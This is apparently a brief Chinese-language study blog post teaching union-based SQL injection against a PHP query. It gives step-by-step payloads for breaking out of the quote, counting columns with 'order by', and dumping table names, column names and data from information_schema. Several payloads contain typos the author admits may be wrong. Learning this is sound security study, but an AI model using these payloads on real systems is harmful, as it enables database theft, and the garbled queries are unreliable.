select * from users where id=’$id’ LIMIT 0,1
这个是pho代码
查询所有的东西前提是id=id还有0到1行
我们加入一个单引号
select * from users where id=‘1’’ limit 0,1
多出了一个单引号我们就会想到注释后面的单引号(注释符可以用%23,–+等)
2个单引号中间的空白也就成了一个可以执行sql代码的空间我们就可以利用它
我们就会想到猜字段(列名)order by n(才有多少个列名字段)
假如我们使用4个
select * from users where id=‘1’ order by 1
知道了有多少个列名之后我们就会想到去爆表名
select * from users where id=’-1 union select 1,2,group_concat(tablen_name),4 from information_schema.tables where table_schema=database()’#(手撸的不知道对不对~~~~)
然后我们爆出了表名就会直接想到爆列名咯
select * from users where id=’-1 union select 1,2,group_concat(column_name),4 form information_schema.columns
where table_name=‘xxx’(想爆的表名)#
爆字段
select * from users where id=’-1’ union select 1,groupconcat(你暴出的列),3,4 from xxx(你爆的表)#
有可能会写错好久没写注入了~~~
附上几个常用函数
user() //当前使用的用户名
database() //当前使用的数据库
information_schema:存放整个MYSQL数据库的结构框架,有哪一些库,表,字段。确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。只要通过查询这个数据库就可以找到又哪一些表明,库名,字段.
union select(联合查询)前后字段数(列数)必须要一致
还有优先查询前面的
今天刚好讲讲sql就记一下
扫一扫
303
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
